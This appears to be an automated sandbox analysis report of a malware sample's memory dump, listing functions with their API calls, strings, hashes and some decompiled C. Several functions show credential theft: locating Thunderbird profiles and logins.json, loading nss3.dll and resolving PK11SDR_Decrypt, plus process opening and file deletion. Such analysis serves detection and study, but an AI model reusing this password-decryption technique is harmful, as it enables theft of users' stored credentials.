StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 05412712
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 05412744
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 05412776
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 054127A8
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 054127DA
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 0541280C
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 0541283E
HeapFree.KERNEL32(00000000,00000000,Scr,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?), ref: 054128E1
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 0541290C

Strings

Scr, xrefs: 054128C0

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: Scr
API String ID: 3298025750-1633706383
Opcode ID: b2ee0d30d493fe40f1f1fb4daf1bcfd48978a5b2ce9cb049bb919d5fc52d5f0f
Instruction ID: 33f16a5a61d919498a567806df65b2af8ccc8379c10c47f192033548aa78aa0d
Opcode Fuzzy Hash: b2ee0d30d493fe40f1f1fb4daf1bcfd48978a5b2ce9cb049bb919d5fc52d5f0f
Instruction Fuzzy Hash: DBC1C7787282256BD728EB77CC85EEB36DDAF182407554876BC07CB244DEB0D4028769

Uniqueness

Uniqueness Score: -1.00%

Function 054016E1, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 0540170E
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0540171A
RtlAllocateHeap.NTDLL(00000000,?), ref: 0540172B
memset.NTDLL ref: 05401748
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 05401756
WaitForSingleObject.KERNEL32(00000000), ref: 05401764
GetDriveTypeW.KERNEL32(?), ref: 05401772
lstrlenW.KERNEL32(?), ref: 0540177E
wcscpy.NTDLL ref: 05401791
lstrlenW.KERNEL32(?), ref: 054017AB
HeapFree.KERNEL32(00000000,?), ref: 054017C4

Strings

\\?\, xrefs: 05401705

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID: \\?\
API String ID: 3888849384-4282027825
Opcode ID: b5829e6f71f2370f9cc82734d7916b872c67b4b8da5aeb67df3def33aca0ee2c
Instruction ID: 1dad8abb026e0eaef9588761da9182022844cdbe3ab6777bb97c17885c58e170
Opcode Fuzzy Hash: b5829e6f71f2370f9cc82734d7916b872c67b4b8da5aeb67df3def33aca0ee2c
Instruction Fuzzy Hash: 19317C32800128BFDF259BA5DC89CEFBFBAFF45360B618066F505E2150DB30AA15CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05404CF1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 05412368: ExpandEnvironmentStringsW.KERNEL32(755506E0,00000000,00000000,755506E0,00000020,80000001,0540F69F,00750025,80000001), ref: 05412379
Part of subcall function 05412368: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 05412396

FreeLibrary.KERNEL32(?), ref: 05404E19

Part of subcall function 0540EAD1: lstrlenW.KERNEL32(?,00000000,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EADE
Part of subcall function 0540EAD1: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EB07
Part of subcall function 0540EAD1: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0540EB27
Part of subcall function 0540EAD1: lstrcpyW.KERNEL32(-00000002,nss3.dll), ref: 0540EB3A
Part of subcall function 0540EAD1: SetCurrentDirectoryW.KERNEL32(?,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EB46
Part of subcall function 0540EAD1: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EB49
Part of subcall function 0540EAD1: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EB55
Part of subcall function 0540EAD1: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 0540EB67
Part of subcall function 0540EAD1: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0540EB76
Part of subcall function 0540EAD1: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 0540EB85
Part of subcall function 0540EAD1: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 0540EB94
Part of subcall function 0540EAD1: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 0540EBA3
Part of subcall function 0540EAD1: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 0540EBB2

FindFirstFileW.KERNEL32(?,?,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 05404D6F
lstrlenW.KERNEL32(?), ref: 05404D8B
lstrlenW.KERNEL32(?), ref: 05404DA3

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

lstrcpyW.KERNEL32(00000000,?), ref: 05404DBC
lstrcpyW.KERNEL32(00000002), ref: 05404DD1

Part of subcall function 0542514A: lstrlenW.KERNEL32(00000000,00000000,75188250,751469A0,?,?,?,05404DE1,?,00000000,?), ref: 0542515A
Part of subcall function 0542514A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,05404DE1,?,00000000,?), ref: 0542517C
Part of subcall function 0542514A: lstrcpyW.KERNEL32(00000000,00000000), ref: 054251A8
Part of subcall function 0542514A: lstrcatW.KERNEL32(00000000,\logins.json), ref: 054251B4

FindNextFileW.KERNEL32(?,00000010), ref: 05404DF9
FindClose.KERNEL32(00000002), ref: 05404E07

Strings

%PROGRAMFILES%\Mozilla Thunderbird, xrefs: 05404D0F
%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default, xrefs: 05404D33

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
String ID: %PROGRAMFILES%\Mozilla Thunderbird$%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default
API String ID: 1209511739-2644807129
Opcode ID: b9fcb9e75ef05fbf8d0d14bec3c8310f80ab53e04cba8264fd3ab177c6e61251
Instruction ID: a8b6566eb32d05e911d82be0f3c694950a916785e465d34f8186c02c4af13592
Opcode Fuzzy Hash: b9fcb9e75ef05fbf8d0d14bec3c8310f80ab53e04cba8264fd3ab177c6e61251
Instruction Fuzzy Hash: 443160715083169BCB21DF21DC09AAFBBE9FF88704F14092EF594D2290DB70CA15DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0542556E, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 69libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSPR4.DLL,?,00000000,00000000,054212F5,00000000,7519F5B0,0540CF17,61636F4C,00000001,?,?), ref: 05425587
LoadLibraryA.KERNEL32(NSS3.DLL,?,?,?,?,?,?,?,?,0540202D,?), ref: 05425595
LoadLibraryA.KERNEL32(xul.dll,?,?,?,?,?,?,?,?,0540202D,?), ref: 054255AA
GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 054255B8
GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 054255C5

Strings

xul.dll, xrefs: 054255A5
PR_GetError, xrefs: 054255B2
NSS3.DLL, xrefs: 0542558F, 05425594
PR_SetError, xrefs: 054255BA
NSPR4.DLL, xrefs: 05425577, 0542557C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AddressProc
String ID: NSPR4.DLL$NSS3.DLL$PR_GetError$PR_SetError$xul.dll
API String ID: 1469910268-282796573
Opcode ID: c949c5ba82ad4dbdccef557a1a7a770b57b60b48562f8c119a900a06322d0c34
Instruction ID: dffdd0457f594be676124d0ae90fa7ff4f2a9289883c116897c443e4cd55ad90
Opcode Fuzzy Hash: c949c5ba82ad4dbdccef557a1a7a770b57b60b48562f8c119a900a06322d0c34
Instruction Fuzzy Hash: 8321A771E602309BC728DB29E883AD57BEAB748750BD1011BF128DB380DBB088428B58

Uniqueness

Uniqueness Score: -1.00%

Function 05403934, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,0542E140,?,00000000,05407F62,0542E140,00000000,?,?,0542137E), ref: 05403967
GetLastError.KERNEL32(?,00000000,05407F62,0542E140,00000000,?,?,0542137E), ref: 05403975
NtSetInformationProcess.NTDLL ref: 054039CF
GetProcAddress.KERNEL32(456C7452,00000000), ref: 05403A0E
GetProcAddress.KERNEL32(61657243), ref: 05403A2F
TerminateThread.KERNEL32(?,00000000,0542137E,00000004,00000000), ref: 05403A86
CloseHandle.KERNEL32(?), ref: 05403A9C
CloseHandle.KERNEL32(?), ref: 05403AC2

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: bbfa5a5c9d4a8d1da0b4cf0de62d4023ffb1b474072b1c2a60581c86b67f763d
Instruction ID: 77c1313473773ab8db215faafa72205743dc066a21cadcf740b9671f8fc96027
Opcode Fuzzy Hash: bbfa5a5c9d4a8d1da0b4cf0de62d4023ffb1b474072b1c2a60581c86b67f763d
Instruction Fuzzy Hash: E9418D71118355AFD720CF65C849AABBFE9BB88304F500E7EF455922A0DB74C9498F62

Uniqueness

Uniqueness Score: -1.00%

Function 0540B88D, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,05420854), ref: 0540B8A5

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

FindFirstFileW.KERNEL32(00000000,00000000,?,00000250,00000000,0000000A,00000208), ref: 0540B90E
lstrlenW.KERNEL32(0000002C,?,00000250,00000000,0000000A,00000208), ref: 0540B936
RemoveDirectoryW.KERNEL32(?,?,00000250,00000000,0000000A,00000208), ref: 0540B988
DeleteFileW.KERNEL32(?,?,00000250,00000000,0000000A,00000208), ref: 0540B993
FindNextFileW.KERNEL32(00000208,00000000,?,00000250,00000000,0000000A,00000208), ref: 0540B9A6

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 8611b428f008ed0ff3bbf2c87c3cfea8bb22a6c0f7712a6a55942e94865ed491
Instruction ID: 450f3c1f0486369f58e91b701108ffb78930161e5ff237b28a548fbe0ca7c4d7
Opcode Fuzzy Hash: 8611b428f008ed0ff3bbf2c87c3cfea8bb22a6c0f7712a6a55942e94865ed491
Instruction Fuzzy Hash: 30414C71910229EFDF11DFA5DD49AEE7FB9FF00304F6050AAE906A62A0DB708A40DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0540A818, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0540A867
lstrlenW.KERNEL32(?), ref: 0540A875
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0540A8A0
lstrcpyW.KERNEL32(00000006,00000000), ref: 0540A8CD

Strings

DelegateExecute, xrefs: 0540A83F
SOFTWARE\Classes\Chrome, xrefs: 0540A8E4

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Query$lstrcpylstrlen
String ID: DelegateExecute$SOFTWARE\Classes\Chrome
API String ID: 3961825720-1743081400
Opcode ID: 31f2abe7387b868ce4dc816e90d97ea657145aa0e4e8e6388cb046ac7d98fa2c
Instruction ID: e346a0a8b4a501e2aa24dc88e62bf42b145f90e7baf5a2885eb884c612095c96
Opcode Fuzzy Hash: 31f2abe7387b868ce4dc816e90d97ea657145aa0e4e8e6388cb046ac7d98fa2c
Instruction Fuzzy Hash: 9F313C72A10219FFDF119FA5C985ADEBBB8FF04350F60406AF906A2290DB759A12DB50

Uniqueness

Uniqueness Score: -1.00%

Function 054117CD, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 054117EF

Part of subcall function 05408F6D: RtlNtStatusToDosError.NTDLL(00000000), ref: 05408FA5
Part of subcall function 05408F6D: SetLastError.KERNEL32(00000000), ref: 05408FAC

GetLastError.KERNEL32(?,00000318,00000008), ref: 054118FF

Part of subcall function 05414518: RtlNtStatusToDosError.NTDLL(00000000), ref: 05414530

memcpy.NTDLL(00000218,05427330,00000100,?,00010003,?,?,00000318,00000008), ref: 0541187E
RtlNtStatusToDosError.NTDLL(00000000), ref: 054118D8

Strings

, xrefs: 05411845

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: c048fca23a315654204894bbe248010715a46abb6b13b5ec38a72e0b52924fcb
Instruction ID: 5e340a1e2e9447c6f594ed03fedd83394dd635aaa71dea23e34e8d03b7427445
Opcode Fuzzy Hash: c048fca23a315654204894bbe248010715a46abb6b13b5ec38a72e0b52924fcb
Instruction Fuzzy Hash: 6F316271A00319AFDB20DF65D988AEAB7B9FF04304F5045AFEA56D7240EB30AA44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0542086C, Relevance: 7.9, APIs: 6, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 054251EF: memset.NTDLL ref: 0542520F

Part of subcall function 054251EF: memset.NTDLL ref: 05425343
Part of subcall function 054251EF: memset.NTDLL ref: 05425358

memcpy.NTDLL(?,00008F12,0000011E), ref: 054208F1
memset.NTDLL ref: 05420927
memset.NTDLL ref: 05420975
memset.NTDLL ref: 054209F4
memset.NTDLL ref: 05420A63
memset.NTDLL ref: 05420B33

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: af84d886fbdd391a459ac1ba65e91887fc579a10c9bab70cc0272b662fbe5b49
Instruction ID: 9b5f1f4da4e0be92e7903c62e3ef247d16313cb83a0e0f4f78e2f8846580093a
Opcode Fuzzy Hash: af84d886fbdd391a459ac1ba65e91887fc579a10c9bab70cc0272b662fbe5b49
Instruction Fuzzy Hash: A5F1D0706007A9DFCB31CF69C588AEBBBF0BF51304F9449AEC5DB96681D231AA45CB10

Uniqueness

Uniqueness Score: -1.00%

Function 05405F90, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0542E0E4,0542E09C), ref: 05405FB4
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0540202D,?), ref: 05405FFF

Part of subcall function 05406BCD: CreateThread.KERNELBASE(00000000,00000000,00000000,05404EA1,00000000,05407CE2), ref: 05406BE4
Part of subcall function 05406BCD: QueueUserAPC.KERNELBASE(05404EA1,00000000,054205B3,?,?,05404EA1,054205B3,00000000,?), ref: 05406BF9
Part of subcall function 05406BCD: GetLastError.KERNEL32(00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05406C04
Part of subcall function 05406BCD: TerminateThread.KERNEL32(00000000,00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05406C0E
Part of subcall function 05406BCD: CloseHandle.KERNEL32(00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05406C15
Part of subcall function 05406BCD: SetLastError.KERNEL32(00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05406C1E

GetLastError.KERNEL32(Function_00001000,00000000,00000000,?,?,?,?,?,?,?,?,0540202D,?), ref: 05405FE7
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0540202D,?), ref: 05405FF7

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: 81259d9240c97855654057767e03cd7b25c4d7d16ce0f164a17ee0a080da97c7
Instruction ID: d1f5b493ba65e246a82bf8637db2b233743f0b9a2140f77b30b4c731a5e994cc
Opcode Fuzzy Hash: 81259d9240c97855654057767e03cd7b25c4d7d16ce0f164a17ee0a080da97c7
Instruction Fuzzy Hash: D8F08171355320AFE3246A689C89EFB7A68EB49375B210136F616C22C0CA740C16CA76

Uniqueness

Uniqueness Score: -1.00%

Function 054105FC, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 05410610
GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 05410650
RtlNtStatusToDosError.NTDLL(00000000), ref: 05410659

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Error$InformationLastQueryStatusThread
String ID:
API String ID: 2450163249-0
Opcode ID: 7e023ed90464c1ff6654ce8f71d10ac0f8a5383eef02d9c2db677c20befecdb1
Instruction ID: 630b0b85db238441df213c9c5da00473ca416df1ccdb29d846f890fa9c4c4dfd
Opcode Fuzzy Hash: 7e023ed90464c1ff6654ce8f71d10ac0f8a5383eef02d9c2db677c20befecdb1
Instruction Fuzzy Hash: FE014B35A00208FFEB24EB92DC09DEFBBBDEB84740F500026FA01E2150EB74D9449B60

Uniqueness

Uniqueness Score: -1.00%

Function 0277A667, Relevance: 3.1, APIs: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0277A667() {
				signed char _t21;
				signed char _t23;
				intOrPtr _t29;
				signed int _t32;
				CHAR* _t35;
				void* _t37;
				void* _t39;

				_t37 = _t39 - 0x78;
				_t35 = 0;
				 *(_t37 - 0x24) = 0x9c;
				if(GetVersionExA(_t37 - 0x24) != 0) {
					_t35 = E027775C4(0x42);
					if(_t35 != 0) {
						_t21 =  *0x277d214; // 0x4000000a
						_t32 = _t21 & 0x000000ff;
						if( *(_t37 - 0x20) != _t32 ||  *(_t37 - 0x1c) != (_t21 & 0x000000ff)) {
							 *(_t37 + 0x70) =  *(_t37 + 0x70) & 0x00000000;
							 *(_t37 - 0x18) =  *(_t37 - 0x18) & 0x00000000;
							 *(_t37 - 0x20) = _t32;
							 *(_t37 - 0x1c) = _t21 & 0x000000ff;
						}
						_t23 =  *0x277d218; // 0x1
						asm("sbb eax, eax");
						_t29 =  *0x277d230; // 0x27ba5a8
						_t16 = _t29 + 0x277e8f1; // 0x252e7525
						wsprintfA(_t35, _t16,  *(_t37 - 0x20),  *(_t37 - 0x1c),  *(_t37 + 0x70) & 0x0000ffff,  *(_t37 - 0x18), ( ~(_t23 & 0x00000001) & 0xffffffea) + 0x56);
					}
				}
				return _t35;
			}

0x0277a668
0x0277a677
0x0277a679
0x0277a688
0x0277a691
0x0277a695
0x0277a697
0x0277a69c
0x0277a6a2
0x0277a6ac
0x0277a6b1
0x0277a6b8
0x0277a6bb
0x0277a6bb
0x0277a6be
0x0277a6c7
0x0277a6db
0x0277a6e3
0x0277a6eb
0x0277a6f1
0x0277a695
0x0277a6fb

APIs

GetVersionExA.KERNEL32(?,00000000), ref: 0277A680

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

wsprintfA.USER32 ref: 0277A6EB

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeapVersionwsprintf
String ID:
API String ID: 3641471311-0
Opcode ID: e8e9a385883c206263518670517b15c0934db8516bb4c765a507741cfe49edc7
Instruction ID: d69143e3763b8e6b446f242f45d2fd9f1d2dd8cb391045d170f1580610813ada
Opcode Fuzzy Hash: e8e9a385883c206263518670517b15c0934db8516bb4c765a507741cfe49edc7
Instruction Fuzzy Hash: 2D1182B2D4022A9BEF21DFA4CC45ABEB7F8FF14305F044519F800E2241E3398559CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05422E10, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 05422E41
RtlNtStatusToDosError.NTDLL(C000009A), ref: 05422E7C

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: d08074c2374843a0e39eba1e94ceeb537d8cb24614559f83d4b2328fe3036373
Instruction ID: 92121ee242a51e2fb28ef9ce9558a6e5eda894f3465aa6c5af08625cfc6fd9de
Opcode Fuzzy Hash: d08074c2374843a0e39eba1e94ceeb537d8cb24614559f83d4b2328fe3036373
Instruction Fuzzy Hash: EAF0FE3A50A63567D73599514908BEF76699F81F50FD5019BAD0177200DBF08D0165E1

Uniqueness

Uniqueness Score: -1.00%

Function 0540E6C4, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0540E6E3
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 0540E6FB

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: bbdf1f0f637b3e371f623b0b7100dd9529f334123945e8ab6df525114369ac5a
Instruction ID: d64d2d50ba54f3b7c67b39a29510368337082fea6ead7f008f9d1723a769b762
Opcode Fuzzy Hash: bbdf1f0f637b3e371f623b0b7100dd9529f334123945e8ab6df525114369ac5a
Instruction Fuzzy Hash: C3F018B6A0422CBADB20DA91DC49FDE7B7CDB04740F405065BE08E61C1E774DB55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05408F6D, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 05408FA5
SetLastError.KERNEL32(00000000), ref: 05408FAC

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: eba5cfe3e3bc4a747c98d6a7a5428319c6d262c8ad0b28114ff07314b27c70a8
Instruction ID: 5231b6d583f78308b45bc39592cef25607359ed02882ac56f4db72cb2a7c28c2
Opcode Fuzzy Hash: eba5cfe3e3bc4a747c98d6a7a5428319c6d262c8ad0b28114ff07314b27c70a8
Instruction Fuzzy Hash: 0CF05471920308FBEB19CB95C90AFEEBBBCAB10345F104058B500E60C1DBB89B04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0540F314, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 0540F341
SetLastError.KERNEL32(00000000,?,054118B9,?,00000000,00000000,00000318,00000020,?,00010003,?,?,00000318,00000008), ref: 0540F348

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: ebee7852856aa7b0541148d7a48f9a9219187dcecd8c05a20865fec2e541b9d8
Instruction ID: 249c38f264e785a64e1196e66cbe673833819123fa9f59523f31769e2686636e
Opcode Fuzzy Hash: ebee7852856aa7b0541148d7a48f9a9219187dcecd8c05a20865fec2e541b9d8
Instruction Fuzzy Hash: E1E01A3220422ABBCF265EE99C06EDB7F69BB08690B504435BA01C2160CA31E8619BB0

Uniqueness

Uniqueness Score: -1.00%

Function 05402A0A, Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 05402A37
SetLastError.KERNEL32(00000000,?,054104C6,?,00000000,00000000,00000004,?,00000000,00000000,75144EE0,00000000), ref: 05402A3E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: eeb325eae888de72a1c3eb1339fcbb399143ad7b954af2aaf2bdc991967553fa
Instruction ID: d052cf73b39ae7e2eecaef14a17c19bc5e66b0fcaa9822714fbfb208fef8b787
Opcode Fuzzy Hash: eeb325eae888de72a1c3eb1339fcbb399143ad7b954af2aaf2bdc991967553fa
Instruction Fuzzy Hash: FCE01A3620423AABCF259EE5DC0AEDF7F69BB48680B404025BE01C21A1CA71C8619FB0

Uniqueness

Uniqueness Score: -1.00%

Function 05414804, Relevance: 2.9, APIs: 2, Instructions: 416COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 05414BDC
memset.NTDLL ref: 05414BEB

Part of subcall function 05415363: memset.NTDLL ref: 05415374
Part of subcall function 05415363: memset.NTDLL ref: 05415380
Part of subcall function 05415363: memset.NTDLL ref: 054153AB

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: f6ee9cd8fbdd9fed58e7593593bca78ba689b86ba4750941e711f85e2b8f81c5
Instruction ID: 710096f6b506dfe3bf07e3f54132b767897a005a9c2333d2179944196fadfed8
Opcode Fuzzy Hash: f6ee9cd8fbdd9fed58e7593593bca78ba689b86ba4750941e711f85e2b8f81c5
Instruction Fuzzy Hash: 5A021270601B619FCB75CF29C6849A7B7F1BF447217604A2EDAE786A90D732F481CB08

Uniqueness

Uniqueness Score: -1.00%

Function 0541BC93, Relevance: 1.9, APIs: 1, Instructions: 610COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0541C32A

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: eaf9236792ca24332193ea984be8becc159d08592b9489003842f2931de8580a
Instruction ID: 050328924d4d59db8b13ab4aa409dc1fb8b13eb9be768a1fa113efd2510cd842
Opcode Fuzzy Hash: eaf9236792ca24332193ea984be8becc159d08592b9489003842f2931de8580a
Instruction Fuzzy Hash: B322747BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 027728E9, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E027728E9(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
